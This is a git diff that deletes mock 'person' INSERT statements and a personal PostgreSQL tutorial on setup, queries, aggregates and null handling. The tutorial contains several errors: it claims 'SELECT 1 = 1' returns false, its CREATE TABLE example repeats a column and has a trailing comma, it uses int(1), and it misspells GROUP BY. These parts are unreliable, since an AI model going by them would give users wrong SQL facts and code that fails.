country_of_birth) values ('Andonis', 'Kenewell', null, 'Male', '9/5/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dannie', 'Harle', 'dharlens@theguardian.com', 'Male', '4/23/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tiff', 'Kettlesing', 'tkettlesingnt@wikimedia.org', 'Female', '4/23/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brandea', 'Sheerman', 'bsheermannu@reddit.com', 'Female', '12/18/2018', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hayyim', 'Screach', 'hscreachnv@unesco.org', 'Male', '7/12/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Odille', 'Tibb', null, 'Female', '5/31/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karola', 'Hamlyn', null, 'Female', '1/28/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Johnathon', 'Arndtsen', null, 'Male', '8/15/2019', 'Haiti'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vanya', 'Lechelle', 'vlechellenz@people.com.cn', 'Female', '5/22/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brose', 'Persent', null, 'Male', '7/7/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Annette', 'Jancey', 'ajanceyo1@state.gov', 'Female', '1/26/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Micheal', 'Bendin', 'mbendino2@cloudflare.com', 'Male', '9/23/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Morgun', 'Spiring', null, 'Male', '6/8/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Emyle', 'Huke', null, 'Female', '2/16/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cassondra', 'Pallas', null, 'Female', '12/30/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacklin', 'MacCulloch', 'jmaccullocho6@amazon.co.uk', 'Female', '11/23/2019', 'Yemen'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stuart', 'Leahy', 'sleahyo7@elpais.com', 'Male', '2/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tybalt', 'Bortoletti', 'tbortolettio8@exblog.jp', 'Male', '6/24/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dwain', 'Lansly', 'dlanslyo9@nyu.edu', 'Male', '2/17/2019', 'Haiti'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cecilio', 'Cranna', null, 'Male', '9/1/2019', 'Estonia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kendrick', 'Bartelot', 'kbartelotob@salon.com', 'Male', '9/3/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Deloris', 'Seiffert', 'dseiffertoc@rambler.ru', 'Female', '8/21/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Noel', 'Entwhistle', 'nentwhistleod@aol.com', 'Male', '3/18/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Oralia', 'MacHoste', null, 'Female', '1/24/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Keelby', 'Vatcher', 'kvatcherof@123-reg.co.uk', 'Male', '1/10/2019', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lisle', 'Atthowe', 'latthoweog@hao123.com', 'Male', '1/9/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alf', 'Audibert', null, 'Male', '2/22/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mano', 'Cream', 'mcreamoi@php.net', 'Male', '11/2/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mina', 'Hudghton', null, 'Female', '12/9/2018', 'Germany'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Torey', 'Turl', null, 'Female', '10/14/2019', 'Ireland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Izzy', 'Pietruschka', 'ipietruschkaol@linkedin.com', 'Male', '11/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delmor', 'Ovesen', 'dovesenom@nsw.gov.au', 'Male', '7/28/2019', 'Ethiopia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Natala', 'Swanborough', 'nswanboroughon@oracle.com', 'Female', '8/21/2019', 'Germany'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stacy', 'Gors', null, 'Male', '2/14/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jennee', 'Deniseau', 'jdeniseauop@pbs.org', 'Female', '1/3/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Regine', 'McKeurton', 'rmckeurtonoq@usnews.com', 'Female', '11/22/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chere', 'Singers', 'csingersor@bloglines.com', 'Female', '2/11/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nady', 'Morot', 'nmorotos@godaddy.com', 'Female', '12/3/2018', 'Haiti'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Melitta', 'Ramelet', null, 'Female', '2/25/2019', 'Bulgaria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aleksandr', 'Danovich', 'adanovichou@angelfire.com', 'Male', '10/16/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ransell', 'Romanin', null, 'Male', '5/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ambrosi', 'Cuchey', null, 'Male', '8/14/2019', 'Iran'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jen', 'Hembling', null, 'Female', '6/28/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Athena', 'Jann', null, 'Female', '10/24/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Forrester', 'Lorincz', 'florinczoz@dot.gov', 'Male', '11/2/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brett', 'Schruur', 'bschruurp0@skype.com', 'Male', '6/18/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Archy', 'Tettersell', null, 'Male', '7/27/2019', 'Honduras'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Callean', 'Mowsdale', null, 'Male', '10/12/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Killian', 'Littrick', null, 'Male', '4/30/2019', 'Spain'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Curcio', 'Tocqueville', 'ctocquevillep4@addthis.com', 'Male', '2/4/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Petunia', 'Tommasuzzi', 'ptommasuzzip5@digg.com', 'Female', '5/13/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Loella', 'Sugar', null, 'Female', '9/9/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Godart', 'Burleigh', 'gburleighp7@hostgator.com', 'Male', '4/21/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darda', 'Crocker', null, 'Female', '11/13/2019', 'Malaysia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Olvan', 'Berrey', 'oberreyp9@sitemeter.com', 'Male', '5/26/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carolynn', 'Guillart', 'cguillartpa@bloglines.com', 'Female', '2/18/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dew', 'Jannex', null, 'Male', '11/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kirby', 'd''Escoffier', 'kdescoffierpc@hc360.com', 'Female', '9/23/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ronnie', 'Yitzhak', 'ryitzhakpd@cmu.edu', 'Male', '4/1/2019', 'Saint Lucia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shelden', 'Brockelsby', null, 'Male', '8/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Merissa', 'Rider', 'mriderpf@taobao.com', 'Female', '10/8/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elvyn', 'Massel', 'emasselpg@odnoklassniki.ru', 'Male', '10/4/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jane', 'Sannes', null, 'Female', '1/28/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Philis', 'Naisbitt', 'pnaisbittpi@google.co.jp', 'Female', '8/11/2019', 'Ghana'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rosabelle', 'Stroder', null, 'Female', '7/6/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Link', 'Voysey', 'lvoyseypk@soup.io', 'Male', '9/13/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vince', 'Parkisson', 'vparkissonpl@studiopress.com', 'Male', '4/16/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Layne', 'Crowcher', 'lcrowcherpm@cloudflare.com', 'Female', '8/6/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elianora', 'Janic', null, 'Female', '8/27/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vallie', 'Wyld', 'vwyldpo@deviantart.com', 'Female', '8/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marilee', 'Simes', 'msimespp@blog.com', 'Female', '9/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gretel', 'Freschini', 'gfreschinipq@nydailynews.com', 'Female', '1/2/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Goran', 'Greenwell', 'ggreenwellpr@qq.com', 'Male', '10/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ambur', 'Ruprechter', 'aruprechterps@ustream.tv', 'Female', '2/4/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alane', 'Youens', 'ayouenspt@dell.com', 'Female', '5/5/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sheela', 'Lamond', null, 'Female', '8/2/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elysee', 'Hallatt', null, 'Female', '2/23/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brigham', 'Falk', null, 'Male', '6/4/2019', 'Denmark'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kristoforo', 'Siney', 'ksineypx@drupal.org', 'Male', '7/9/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vanny', 'Blaker', 'vblakerpy@ucla.edu', 'Female', '2/26/2019', 'Croatia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Quentin', 'Slafford', 'qslaffordpz@harvard.edu', 'Female', '7/25/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jean', 'Buterton', 'jbutertonq0@utexas.edu', 'Female', '11/8/2019', 'Venezuela'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Riva', 'Dasent', 'rdasentq1@yellowbook.com', 'Female', '7/2/2019', 'Nepal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Herschel', 'Pattlel', null, 'Male', '8/24/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Addison', 'Cork', 'acorkq3@techcrunch.com', 'Male', '5/9/2019', 'Myanmar'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Danni', 'Cathersides', 'dcathersidesq4@imageshack.us', 'Female', '11/1/2019', 'Uruguay'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Justinn', 'Mcasparan', null, 'Female', '5/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Paige', 'Diehn', null, 'Male', '11/12/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bent', 'Muckeen', null, 'Male', '6/15/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rina', 'Culkin', null, 'Female', '10/7/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Viola', 'Apfelmann', null, 'Female', '2/19/2019', 'Cuba'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Holt', 'Plain', 'hplainqa@ow.ly', 'Male', '9/13/2019', 'Azerbaijan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cathee', 'Rollingson', null, 'Female', '4/19/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delphine', 'Fearfull', 'dfearfullqc@t-online.de', 'Female', '3/12/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wynne', 'Klosa', 'wklosaqd@independent.co.uk', 'Female', '8/27/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Riordan', 'Jewks', 'rjewksqe@java.com', 'Male', '7/29/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Brodie', 'Seven', null, 'Male', '9/4/2019', 'Egypt'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shandee', 'Whitley', 'swhitleyqg@mit.edu', 'Female', '4/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Yevette', 'Windows', 'ywindowsqh@cargocollective.com', 'Female', '10/2/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kali', 'Delyth', 'kdelythqi@auda.org.au', 'Female', '2/1/2019', 'South Sudan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gerri', 'Lipson', 'glipsonqj@google.pl', 'Female', '6/22/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Myrtie', 'Havill', 'mhavillqk@merriam-webster.com', 'Female', '12/6/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zebadiah', 'Issit', 'zissitql@vkontakte.ru', 'Male', '7/29/2019', 'Italy'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Franny', 'Sextone', 'fsextoneqm@washingtonpost.com', 'Female', '12/5/2018', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gallard', 'Irce', 'girceqn@cnet.com', 'Male', '2/25/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rivkah', 'Harteley', null, 'Female', '2/4/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gifford', 'Hallows', null, 'Male', '4/24/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delinda', 'Jaan', 'djaanqq@cyberchimps.com', 'Female', '7/28/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cosette', 'Folcarelli', 'cfolcarelliqr@hatena.ne.jp', 'Female', '7/10/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Josi', 'McCurt', 'jmccurtqs@de.vu', 'Female', '8/12/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Terri', 'Espadas', null, 'Male', '8/17/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Muffin', 'Emery', null, 'Male', '11/4/2019', 'Bosnia and Herzegovina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Erick', 'Vertigan', 'evertiganqv@1688.com', 'Male', '4/20/2019', 'Swaziland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lorain', 'Borthe', 'lbortheqw@npr.org', 'Female', '3/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Artemas', 'Spratling', 'aspratlingqx@xrea.com', 'Male', '11/23/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Peter', 'Gerlack', null, 'Male', '6/10/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wyn', 'Muzzillo', null, 'Male', '1/1/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Phedra', 'Scattergood', 'pscattergoodr0@soup.io', 'Female', '3/8/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cynthia', 'Batchley', null, 'Female', '5/26/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Portia', 'Chilvers', 'pchilversr2@twitpic.com', 'Female', '10/6/2019', 'Kenya'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alisander', 'Auty', null, 'Male', '11/21/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lucilia', 'Onion', 'lonionr4@apple.com', 'Female', '4/18/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tobit', 'Cursey', 'tcurseyr5@ifeng.com', 'Male', '9/26/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Willey', 'Dmitrichenko', null, 'Male', '7/1/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dani', 'Shawl', null, 'Female', '10/6/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ricki', 'Garnsworth', 'rgarnsworthr8@phoca.cz', 'Female', '9/18/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clem', 'Cuddon', 'ccuddonr9@fema.gov', 'Male', '5/14/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sena', 'Arr', 'sarrra@cdc.gov', 'Female', '7/24/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carissa', 'Siley', 'csileyrb@army.mil', 'Female', '7/17/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Antony', 'Shelliday', 'ashellidayrc@unblog.fr', 'Male', '8/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rollo', 'McGaraghan', 'rmcgaraghanrd@boston.com', 'Male', '3/23/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Noelyn', 'de Quincey', 'ndequinceyre@jugem.jp', 'Female', '5/13/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Isidora', 'Greensite', null, 'Female', '7/1/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gussy', 'Simonutti', 'gsimonuttirg@amazon.co.uk', 'Female', '4/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lotte', 'Compford', null, 'Female', '12/8/2018', 'Botswana'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Annette', 'Morling', 'amorlingri@noaa.gov', 'Female', '12/2/2018', 'Nepal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Deborah', 'Perello', 'dperellorj@ezinearticles.com', 'Female', '5/16/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bobbe', 'Matusevich', null, 'Female', '9/21/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wes', 'Larchier', 'wlarchierrl@tumblr.com', 'Male', '11/24/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Edd', 'Records', null, 'Male', '10/27/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Eustacia', 'Billitteri', 'ebillitterirn@ning.com', 'Female', '10/27/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shanda', 'Prujean', 'sprujeanro@techcrunch.com', 'Female', '11/27/2019', 'Cayman Islands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lilas', 'Ketchell', 'lketchellrp@gravatar.com', 'Female', '4/16/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cortie', 'Kopelman', null, 'Male', '7/26/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lucian', 'Cardow', 'lcardowrr@pagesperso-orange.fr', 'Male', '10/29/2019', 'Russia'); diff --git a/data/sql/postgresql.md b/data/sql/postgresql.md deleted file mode 100644 index c7db904..0000000 --- a/data/sql/postgresql.md +++ /dev/null @@ -1,364 +0,0 @@ ---- -title: "postgresql" -tags: [ "Documentation", "data" ] ---- -# Setup - -Install postgres and start it as a service, then start with: - -> psql - -## Arch setup - -> su -l postgres - -> initdb -D /var/lib/postgres/data - -## Make a database as the new user postgres - -> sudo su postgres - -> [postgres] echo $HOME - -> [postgres] - -> [postgres] CREATE DATABASE dvdrental; - -## Sample Data - -Get sample data. - -> wget http://www.postgresqltutorial.com/wp-content/uploads/2019/05/dvdrental.zip - -And then get the pdf mapping the sample data: - -> wget http://www.postgresqltutorial.com/wp-content/uploads/2018/03/printable-postgresql-sample-database-diagram.pdf - -Unzip and load sample data: - -> unzip dvdrental.zip - -> sudo su postgres - - -> [postgres] $ pg_restore -U postgres -d dvdrental dvdrental.tar - - -> [postgres] - -# Commands - -## Basics - -List available databases. - -> \l - -You'll see a list of available databases like: - -`dnd` - -`dvdrentals` - -Then you can connect to one: - -> \c dvdrental - -And have a look at what tables it has: - -> \d dvdrental - -If it has tables such as `language`, `film_actor` and `inventory`, you can see the table's settings with: - -> \dt film_actor - -And pull back the entire table: - -> SELECT * from film_actor; - -## Various - -Connect to with user 'bob', port 1234, database 'X' - -> psql -h -p1234 -U bob X - -# Setup Yourself - -Make database "test" and connect to it. - -> CREATE DATABASE test; - -> \l test - -Delete database 'dogs': - -> DROP DATABASE dogs; - -Making a table has a basic form of: - -`CREATE TABLE table_name (` - -then [ column name ] + [data type ] ... (and possibly data constraints) - -`)` - -|Data Types | Meaning | Constraints | -|:----|:----|:----| -| BIGSERIAL | A number incrementing by one each entry | 'NOT NULL PRIMARY KEY (so it's used for relational reference) | -| int | integer | (50) limits the table to 50, e.g. `int(50)`| -| VARCHAR | any characters | limit, e.g.`VARCHAR(70)`| -| TIMESTAMP | time | | -| date | date | | -| text | text? | | -| tsquery | text search query | | -| money | money | | -| json | textual JSON data | | -| cidr | ipv4 or 6 address | | -| macaddr | mac address | | - - -E.g. - -``` -CREATE TABLE character ( -id int, -str int(1), -dex int(1), -spd int(1), -int int(1), -wts int(1), -cha int(1)); - -``` - -See your table: - -> \d - -Look at what columns you have there: - -> \d character - -But this allows for empty characters, so... - -``` - -CREATE TABLE person ( - id BIGSERIAL NOT NULL PRIMARY KEY, - first_name VARCHAR(50) NOT NULL, - last_name VARCHAR(50) NOT NULL, - last_name VARCHAR(50) NOT NULL, - gender VARCHAR(7) NOT NULL, - date_of_birth DATE NOT NULL, -); - -``` - -Delete with - -> DROP TABLE person; - -## Inserting Data - -``` - -INSERT INTO person ( - first_name, - last_name, - gender, - date_of_birth) -VALUES ('Hugi','Smith','DWARF', date '200-01-12'); - -``` - -## Selecting Data -You can also mass select by choosing to insert a file. Download example data [here](https://mockaroo.com/). - -> \i /home/ghost/file.sql - -Various querries: - -> SELECT * FROM person; - -> SELECT * FROM person ORDER BY id DESC; - -> SELECT * FROM person - -## Offset, Fetch and Limit - -'Limit' is not official, but was accepted later: - -> SELECT * FROM person ORDER BY country ASC LIMIT 10; - -The official way to make a limit is 'FIRST 5 ROWS ONLY: - -> SELECT * FROM person OFFSET 5 FETCH FIRST 5 ROWS ONLY; - -> SELECT * FROM person where gender = 'Male' AND ( country_of_birth = 'Poland' OR country_of_birth = 'China'); - -Miss out the first 5 result with 'OFFSET 5'. - -> SELECT p\* FROM PERSON WHERE gender = 'Female' AND country_of_birth = 'Kosovo' OFFSET 5; - -> SELECT * FROM person OFFSET 5 FETCH FIRST 7 ROW ONLY; - -## Advanced Selection - -This query takes a lot of typing: - -> SELECT * FROM person WHERE country_of_birth = 'China' -> OR country_of_birth = 'Kosovo' -> OR country_of_birth = 'Brazil'; - -You can write the same thing with less typing: - -> SELECT * -> FROM person -> WHERE country_of_birth in ('China','Kosovo','Brazil'); - -> SELECT * FROM person -> WHERE date_of_birth -BETWEEN DATE '2018-04-10' AND '2019-01-01' -> ORDER BY date_of_birth; - -### Rough Search - -Similar words - we can find emails ending in '.com'. - -> SELECT * FROM person -> WHERE email LIKE '%.com'; - -Or any gmail address: - -> SELECT * FROM person -> WHERE email LIKE '%@gmail.%'; - -Or particular characters, where three precede 'gmail.com' and it's case insensitive: - -> SELECT * FROM person -> WHERE email iLIKE '\_\_\_@gmail.com'; - -### Groups and Aggregates - -Select all countries as a complete mess: - -> SELECT country_of_birth FROM person; - -Select countries with proper grouping: - -> SELECT country_of_birth FROM person GROUP BY country_of_birth; - -Select countries and count instances: - -> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth ORDER BY country_of_birth; - -Also select a minimum number with 'having'. What you have must be before 'order by'. - -> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) > 5; - -> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) >= 10; - -Other aggregates include 'max', 'min'. - -Select most expensive car: - -> SELECT MAX(price) FROM car; - -> SELECT MIN(price) FROM car; - -> SELECT AVG(price) FROM car; - -We can stick items together for better grouping: - -> SELECT make, model, MAX(price) FROM car GROPU BY make, model; - -Select all fields from table 'car', and add a column containing another price, discounted to 90%, rounded to two decimal places. - -> SELECT id,make,model,price,ROUND(price * .9, 2) from car; - -Same thing, but take 10% of the price from the price. - -> SELECT id,make,model,price,ROUND(price - (price * .1), 2) from car; - - - -## Comparison - -> SELECT 10 + 2^2; - -> SELECT 10! * 2 - 3; - -... et c. - -This returns false: - -> SELECT 1 = 1; - -These return false: - -> SELECT 2<1; - -Or '1 is not equal to 1': - -> SELECT 1<>1; - -And with strings, 'G is not the same as g': - -> SELECT 'G'<>'g'; - -### Car Disconts - -You want to show the discounts on various cars. You check which columns are available and select all of them: - -> \d car - -> SELECT id,make,model,price FROM car; - -## Aliases - -You can change what a column name appears as with: - -> select price AS original_price from car; - -# Null Values - -## Coalesce - -You can input a series of entries, requesting the first one which is present. Here we input three entries which are 'null', and a third which is '2', so '2' is selected: - -> SELECT COALESCE(null, null, 2) AS number; - -When selecting column 'email' from table 'person', you can input the string 'Email not provided' if there is no email provided: - -> SELECT COALESCE(email, 'Email not provided') from person; - -## Nullif - -Normally, devision by 0 produces an error: - -> SELECT 10/ 0; - -But 10 divided by 'null' produces only 'null', which is not an error. - -The 'nullif' statement takes two numbers, and returns 'null' iff the numbers are the same as each other. - -> select nullif(0,0) -> select nullif(10,10) - -# Date - -Select date: - -> SELECT NOW()::DATE; - -> SELECT NOW()::TIME; - -or just: - -> SELECT NOW(); - -More [here](postgresql.org/docs/11/datatype-datetime.html). - - -2h23m - diff --git a/data/sql/sql.md b/data/sql/sql.md deleted file mode 100644 index ee354c4..0000000 --- a/data/sql/sql.md +++ /dev/null @@ -1,94 +0,0 @@ ---- -title: "sql" -tags: [ 